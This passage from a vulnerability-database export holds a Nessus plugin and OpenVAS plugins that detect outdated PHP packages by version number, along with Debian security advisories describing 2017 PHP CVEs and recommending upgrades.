gdImageCreateFromGifCtx()\n function within file gd_gif_in.c when handling a\n specially crafted GIF file. An unauthenticated, remote\n attacker can exploit this to disclose sensitive memory\n contents or crash a process linked to the library.\n (CVE-2017-7890)\n\n - An out-of-bounds read error exists in Oniguruma in the\n match_at() function within file regexec.c. An\n unauthenticated, remote attacker can exploit this to\n disclose sensitive memory contents or crash a process\n linked to the library. (CVE-2017-9224)\n\n - An out-of-bounds write error exists in Oniguruma in the\n next_state_val() function during regular expression\n compilation. An unauthenticated, remote attacker can\n exploit this to execute arbitrary code. (CVE-2017-9226)\n\n - An out-of-bounds read error exists in Oniguruma in the\n mbc_enc_len() function within file utf8.c. An\n unauthenticated, remote attacker can exploit this to\n disclose memory contents or crash a process linked to\n the library. (CVE-2017-9227)\n\n - An out-of-bounds write error exists in Oniguruma in the\n bitset_set_range() function during regular expression\n compilation. An unauthenticated, remote attacker can\n exploit this to execute arbitrary code. (CVE-2017-9228)\n\n - An invalid pointer deference flaw exists in Oniguruma\n in the left_adjust_char_head() function within file\n regexec.c during regular expression compilation. An\n unauthenticated, remote attacker can exploit this to\n crash a process linked to the library, resulting in a\n denial of service condition. (CVE-2017-9229)\n\n - A denial of service condition exists in PHP when\n handling overlarge POST requests. An unauthenticated,\n remote attacker can exploit this to exhaust available\n CPU resources. (CVE-2017-11142)\n\n - An extended invalid free error exists in PHP in the\n php_wddx_push_element() function within file\n ext/wddx/wddx.c when parsing empty boolean tags.\n An unauthenticated, remote attacker can exploit this to\n cause a denial of service condition. (CVE-2017-11143)\n\n - A flaw exists in OpenSSL in the EVP_SealInit() function\n within file crypto/evp/p_seal.c due to returning an\n undocumented value of '-1'. An unauthenticated, remote\n attacker can exploit this to cause an unspecified\n impact. (CVE-2017-11144)\n\n - An out-of-bounds read error exists in PHP in the\n php_parse_date() function within file\n ext/date/lib/parse_date.c. An unauthenticated, remote\n attacker can exploit this to disclose memory contents or\n cause a denial of service condition.\n (CVE-2017-11145)\n\n - An out-of-bounds read error exists in PHP in the\n finish_nested_data() function within file\n ext/standard/var_unserializer.re. An unauthenticated,\n remote attacker can exploit this to disclose memory\n contents or cause a denial of service condition.\n\n - An off-by-one overflow condition exists in PHP in the\n INI parsing API, specifically in the zend_ini_do_op()\n function within file Zend/zend_ini_parser.y, due to\n improper validation of user-supplied input. An\n unauthenticated, remote attacker can exploit this to\n cause a denial of service condition or the execution of\n arbitrary code.\n\n - A Heap buffer overread flaw in finish_nested_data\n while unserializing untrusted data could lead to an\n unspecified impact on the integrity of PHP.\n (CVE-2017-12933)\n\n - A stack-based buffer overflow in the zend_ini_do_op()\n function in Zend/zend_ini_parser.c could cause a denial\n of service or potentially allow executing code.\n (CVE-2017-11628)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 27, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-09-12T00:00:00", "title": "Tenable SecurityCenter PHP < 5.6.31 Multiple Vulnerabilities (TNS-2017-12", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-9224", "CVE-2017-12933", "CVE-2017-9228", "CVE-2017-9226", "CVE-2017-11143", "CVE-2017-9229", "CVE-2017-9227", "CVE-2017-11628", "CVE-2017-7890", "CVE-2017-11145", "CVE-2017-11144", "CVE-2017-11142", "CVE-2017-6004"], "modified": "2017-09-12T00:00:00", "cpe": ["cpe:/a:tenable:securitycenter"], "id": "SECURITYCENTER_PHP_5_6_31.NASL", "href": "https://www.tenable.com/plugins/nessus/103121", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103121);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/09\");\n\n script_cve_id(\n \"CVE-2017-6004\",\n \"CVE-2017-7890\",\n \"CVE-2017-9224\",\n \"CVE-2017-9226\",\n \"CVE-2017-9227\",\n \"CVE-2017-9228\",\n \"CVE-2017-9229\",\n \"CVE-2017-11142\",\n \"CVE-2017-11143\",\n \"CVE-2017-11144\",\n \"CVE-2017-11145\",\n \"CVE-2017-11628\",\n \"CVE-2017-12933\"\n );\n script_bugtraq_id(\n 96295,\n 99489,\n 99490,\n 99492,\n 99501,\n 99550,\n 99553,\n 99601,\n 99605,\n 100320,\n 100538,\n 101244\n );\n\n script_name(english:\"Tenable SecurityCenter PHP < 5.6.31 Multiple Vulnerabilities (TNS-2017-12\");\n script_summary(english:\"Checks the version of PHP in SecurityCenter.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Tenable SecurityCenter application on the remote host contains a\nPHP library that is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Tenable SecurityCenter application installed on the remote host\nis missing a security patch. It is, therefore, affected by multiple\nvulnerabilities in the bundled version of PHP :\n\n - An out-of-bounds read error exists in the PCRE library\n in the compile_bracket_matchingpath() function within\n file pcre_jit_compile.c. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n regular expression, to crash a process linked to the\n library, resulting in a denial of service condition.\n (CVE-2017-6004)\n\n - An out-of-bounds read error exists in the GD Graphics\n Library (LibGD) in the gdImageCreateFromGifCtx()\n function within file gd_gif_in.c when handling a\n specially crafted GIF file. An unauthenticated, remote\n attacker can exploit this to disclose sensitive memory\n contents or crash a process linked to the library.\n (CVE-2017-7890)\n\n - An out-of-bounds read error exists in Oniguruma in the\n match_at() function within file regexec.c. An\n unauthenticated, remote attacker can exploit this to\n disclose sensitive memory contents or crash a process\n linked to the library. (CVE-2017-9224)\n\n - An out-of-bounds write error exists in Oniguruma in the\n next_state_val() function during regular expression\n compilation. An unauthenticated, remote attacker can\n exploit this to execute arbitrary code. (CVE-2017-9226)\n\n - An out-of-bounds read error exists in Oniguruma in the\n mbc_enc_len() function within file utf8.c. An\n unauthenticated, remote attacker can exploit this to\n disclose memory contents or crash a process linked to\n the library. (CVE-2017-9227)\n\n - An out-of-bounds write error exists in Oniguruma in the\n bitset_set_range() function during regular expression\n compilation. An unauthenticated, remote attacker can\n exploit this to execute arbitrary code. (CVE-2017-9228)\n\n - An invalid pointer deference flaw exists in Oniguruma\n in the left_adjust_char_head() function within file\n regexec.c during regular expression compilation. An\n unauthenticated, remote attacker can exploit this to\n crash a process linked to the library, resulting in a\n denial of service condition. (CVE-2017-9229)\n\n - A denial of service condition exists in PHP when\n handling overlarge POST requests. An unauthenticated,\n remote attacker can exploit this to exhaust available\n CPU resources. (CVE-2017-11142)\n\n - An extended invalid free error exists in PHP in the\n php_wddx_push_element() function within file\n ext/wddx/wddx.c when parsing empty boolean tags.\n An unauthenticated, remote attacker can exploit this to\n cause a denial of service condition. (CVE-2017-11143)\n\n - A flaw exists in OpenSSL in the EVP_SealInit() function\n within file crypto/evp/p_seal.c due to returning an\n undocumented value of '-1'. An unauthenticated, remote\n attacker can exploit this to cause an unspecified\n impact. (CVE-2017-11144)\n\n - An out-of-bounds read error exists in PHP in the\n php_parse_date() function within file\n ext/date/lib/parse_date.c. An unauthenticated, remote\n attacker can exploit this to disclose memory contents or\n cause a denial of service condition.\n (CVE-2017-11145)\n\n - An out-of-bounds read error exists in PHP in the\n finish_nested_data() function within file\n ext/standard/var_unserializer.re. An unauthenticated,\n remote attacker can exploit this to disclose memory\n contents or cause a denial of service condition.\n\n - An off-by-one overflow condition exists in PHP in the\n INI parsing API, specifically in the zend_ini_do_op()\n function within file Zend/zend_ini_parser.y, due to\n improper validation of user-supplied input. An\n unauthenticated, remote attacker can exploit this to\n cause a denial of service condition or the execution of\n arbitrary code.\n\n - A Heap buffer overread flaw in finish_nested_data\n while unserializing untrusted data could lead to an\n unspecified impact on the integrity of PHP.\n (CVE-2017-12933)\n\n - A stack-based buffer overflow in the zend_ini_do_op()\n function in Zend/zend_ini_parser.c could cause a denial\n of service or potentially allow executing code.\n (CVE-2017-11628)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/tns-2017-12\");\n script_set_attribute(attribute:\"see_also\", value:\"http://php.net/ChangeLog-5.php#5.6.31\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.tenable.com/support-center/index.php?x=&mod_id=160\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant patch as referenced in the vendor advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-9224\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:tenable:securitycenter\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n \n script_dependencies(\"securitycenter_installed.nbin\", \"securitycenter_detect.nbin\");\n script_require_keys(\"Host/SecurityCenter/Version\", \"installed_sw/SecurityCenter\", \"Host/SecurityCenter/support/php/version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"install_func.inc\");\ninclude(\"misc_func.inc\");\n\napp = 'PHP (within SecurityCenter)';\nfix = \"5.6.31\";\n\nsc_ver = get_kb_item(\"Host/SecurityCenter/Version\");\nport = 0;\nif(empty_or_null(sc_ver))\n{\n port = 443;\n install = get_single_install(app_name:\"SecurityCenter\", combined:TRUE, exit_if_unknown_ver:TRUE);\n sc_ver = install[\"version\"];\n}\nif (empty_or_null(sc_ver)) audit(AUDIT_NOT_INST, \"SecurityCenter\");\n\nversion = get_kb_item(\"Host/SecurityCenter/support/php/version\");\nif (empty_or_null(version)) audit(AUDIT_UNKNOWN_APP_VER, app);\n\nif (ver_compare(ver:version, minver:\"5.6.0\", fix:fix, strict:FALSE) < 0)\n{\n report =\n '\\n SecurityCenter version : ' + sc_ver +\n '\\n SecurityCenter PHP version : ' + version +\n '\\n Fixed PHP version : ' + fix +\n '\\n';\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, app, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2019-05-30T02:22:32", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10397", "CVE-2017-11143", "CVE-2017-11147", "CVE-2017-11145", "CVE-2017-11144"], "description": "Package : php5\nVersion : 5.4.45-0+deb7u9\nCVE ID : CVE-2016-10397 CVE-2017-11143 CVE-2017-11144\n CVE-2017-11145 CVE-2017-11147\n\nSeveral issues have been discovered in PHP (recursive acronym for PHP:\nHypertext Preprocessor), a widely-used open source general-purpose\nscripting language that is especially suited for web development and can\nbe embedded into HTML.\n\nCVE-2016-10397\n Incorrect handling of various URI components in the URL parser could\n be used by attackers to bypass hostname-specific URL checks.\n\nCVE-2017-11143\n An invalid free in the WDDX deserialization of boolean parameters\n could be used by attackers able to inject XML for deserialization to\n crash the PHP interpreter.\n\nCVE-2017-11144\n The openssl extension PEM sealing code did not check the return value\n of the OpenSSL sealing function, which could lead to a crash of the\n PHP interpreter.\n\nCVE-2017-11145\n Lack of a bounds check in the date extension's timelib_meridian\n parsing code could be used by attackers able to supply date strings to\n leak information from the interpreter.\n\nCVE-2017-11147\n The PHAR archive handler could be used by attackers supplying\n malicious archive files to crash the PHP interpreter or potentially\n disclose information due to a buffer over-read in the\n phar_parse_pharfile function in ext/phar/phar.c.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n5.4.45-0+deb7u9.\n\nWe recommend that you upgrade your php5 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 3, "modified": "2017-07-21T11:46:15", "published": "2017-07-21T11:46:15", "id": "DEBIAN:DLA-1034-1:86C1B", "href": "https://lists.debian.org/debian-lts-announce/2017/debian-lts-announce-201707/msg00026.html", "title": "[SECURITY] [DLA 1034-1] php5 security update", "type": "debian", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2020-08-12T00:52:11", "bulletinFamily": "unix", "cvelist": ["CVE-2017-12933", "CVE-2017-11143", "CVE-2017-11628", "CVE-2017-16642", "CVE-2017-11145", "CVE-2017-11144", "CVE-2017-11142"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4081-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nJanuary 08, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : php5\nCVE ID : CVE-2017-11142 CVE-2017-11143 CVE-2017-11144\n CVE-2017-11145 CVE-2017-11628 CVE-2017-12933\n\t\t CVE-2017-16642\n\nSeveral vulnerabilities were found in PHP, a widely-used open source\ngeneral purpose scripting language:\n\nCVE-2017-11142\n\n Denial of service via overly long form variables\n\nCVE-2017-11143\n\n Invalid free() in wddx_deserialize()\n\nCVE-2017-11144\n\n Denial of service in openssl extension due to incorrect return value\n check of OpenSSL sealing function.\n\nCVE-2017-11145\n\n Out-of-bounds read in wddx_deserialize()\n\nCVE-2017-11628\n\n Buffer overflow in PHP INI parsing API\n\nCVE-2017-12933\n\n Buffer overread in finish_nested_data()\n\nCVE-2017-16642\n\n Out-of-bounds read in timelib_meridian()\n\nFor the oldstable distribution (jessie), these problems have been fixed\nin version 5.6.33+dfsg-0+deb8u1.\n\nWe recommend that you upgrade your php5 packages.\n\nFor the detailed security status of php5 please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/php5\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 8, "modified": "2018-01-08T22:34:24", "published": "2018-01-08T22:34:24", "id": "DEBIAN:DSA-4081-1:FFD0A", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2018/msg00003.html", "title": "[SECURITY] [DSA 4081-1] php5 security update", "type": "debian", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-08-12T00:51:19", "bulletinFamily": "unix", "cvelist": ["CVE-2017-12933", "CVE-2017-12932", "CVE-2017-12934", "CVE-2017-11628", "CVE-2017-16642", "CVE-2017-11145", "CVE-2017-11144"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4080-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nJanuary 08, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : php7.0\nCVE ID : CVE-2017-11144 CVE-2017-11145 CVE-2017-11628\n CVE-2017-12932 CVE-2017-12933 CVE-2017-12934\n\t\t CVE-2017-16642\n\nSeveral vulnerabilities were found in PHP, a widely-used open source\ngeneral purpose scripting language:\n\nCVE-2017-11144\n\n Denial of service in openssl extension due to incorrect return value\n check of OpenSSL sealing function\n\nCVE-2017-11145\n\n Out-of-bounds read in wddx_deserialize()\n\nCVE-2017-11628\n\n Buffer overflow in PHP INI parsing API\n\nCVE-2017-12932 / CVE-2017-12934\n\n Use-after-frees during unserialisation\n\nCVE-2017-12933\n\n Buffer overread in finish_nested_data()\n\nCVE-2017-16642\n\n Out-of-bounds read in timelib_meridian()\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 7.0.27-0+deb9u1.\n\nWe recommend that you upgrade your php7.0 packages.\n\nFor the detailed security status of php7.0 please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/php7.0\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 8, "modified": "2018-01-08T22:30:28", "published": "2018-01-08T22:30:28", "id": "DEBIAN:DSA-4080-1:ADEE1", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2018/msg00002.html", "title": "[SECURITY] [DSA 4080-1] php7.0 security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2020-01-29T20:11:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10397", "CVE-2017-11143", "CVE-2017-11147", "CVE-2017-11145", "CVE-2017-11144"], "description": "Several issues have been discovered in PHP (recursive acronym for PHP:\nHypertext Preprocessor), a widely-used open source general-purpose\nscripting language that is especially suited for web development and can\nbe embedded into HTML.\n\nCVE-2016-10397\nIncorrect handling of various URI components in the URL parser could\nbe used by attackers to bypass hostname-specific URL checks.\n\nCVE-2017-11143\nAn invalid free in the WDDX deserialization of boolean parameters\ncould be used by attackers able to inject XML for deserialization to\ncrash the PHP interpreter.\n\nCVE-2017-11144\nThe openssl extension PEM sealing code did not check the return value\nof the OpenSSL sealing function, which could lead to a crash of the\nPHP interpreter.\n\nCVE-2017-11145\nLack of a bounds check in the date extension", "modified": "2020-01-29T00:00:00", "published": "2018-02-08T00:00:00", "id": "OPENVAS:1361412562310891034", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891034", "type": "openvas", "title": "Debian LTS: Security Advisory for php5 (DLA-1034-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891034\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2016-10397\", \"CVE-2017-11143\", \"CVE-2017-11144\", \"CVE-2017-11145\", \"CVE-2017-11147\");\n script_name(\"Debian LTS: Security Advisory for php5 (DLA-1034-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-02-08 00:00:00 +0100 (Thu, 08 Feb 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2017/07/msg00026.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"php5 on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n5.4.45-0+deb7u9.\n\nWe recommend that you upgrade your php5 packages.\");\n\n script_tag(name:\"summary\", value:\"Several issues have been discovered in PHP (recursive acronym for PHP:\nHypertext Preprocessor), a widely-used open source general-purpose\nscripting language that is especially suited for web development and can\nbe embedded into HTML.\n\nCVE-2016-10397\nIncorrect handling of various URI components in the URL parser could\nbe used by attackers to bypass hostname-specific URL checks.\n\nCVE-2017-11143\nAn invalid free in the WDDX deserialization of boolean parameters\ncould be used by attackers able to inject XML for deserialization to\ncrash the PHP interpreter.\n\nCVE-2017-11144\nThe openssl extension PEM sealing code did not check the return value\nof the OpenSSL sealing function, which could lead to a crash of the\nPHP interpreter.\n\nCVE-2017-11145\nLack of a bounds check in the date extension's timelib_meridian\nparsing code could be used by attackers able to supply date strings to\nleak information from the interpreter.\n\nCVE-2017-11147\nThe PHAR archive handler could be used by attackers supplying\nmalicious archive files to crash the PHP interpreter or potentially\ndisclose information due to a buffer over-read in the\nphar_parse_pharfile function in ext/phar/phar.c.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libphp5-embed\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-enchant\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-fpm\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-imap\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-interbase\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-intl\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-mcrypt\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-mysqlnd\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.4.45-0+deb7u9\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2020-01-31T18:28:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10397", "CVE-2017-11146", "CVE-2017-11628", "CVE-2017-11147", "CVE-2016-5766", "CVE-2017-7890", "CVE-2017-11145", "CVE-2017-11144", "CVE-2017-11142"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2017-09-05T00:00:00", "id": "OPENVAS:1361412562310851607", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851607", "type": "openvas", "title": "openSUSE: Security Advisory for php7 (openSUSE-SU-2017:2337-1)", "sourceData": "# Copyright (C) 2017 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851607\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-09-05 07:21:01 +0200 (Tue, 05 Sep 2017)\");\n script_cve_id(\"CVE-2016-10397\", \"CVE-2016-5766\", \"CVE-2017-11142\", \"CVE-2017-11144\",\n \"CVE-2017-11145\", \"CVE-2017-11146\", \"CVE-2017-11147\", \"CVE-2017-11628\",\n \"CVE-2017-7890\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for php7 (openSUSE-SU-2017:2337-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php7'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for php7 fixes the following issues:\n\n - CVE-2016-10397: parse_url() can be bypassed to return fake host.\n (bsc#1047454)\n\n - CVE-2017-11142: Remoteattackers could cause a CPU consumption denial of\n service attack by injectinglong form variables, related to\n main/php_variables. (bsc#1048100)\n\n - CVE-2017-11144: The opensslextension PEM sealing code did not check the\n return value of the OpenSSL sealingfunction, which could lead to a\n crash. (bsc#1048096)\n\n - CVE-2017-11145: Lack of bounds checks in timelib_meridian could lead to\n information leak. (bsc#1048112)\n\n - CVE-2017-11146: Lack of bounds checks in timelib_meridian parse code\n could lead to information leak. (bsc#1048111)\n\n - 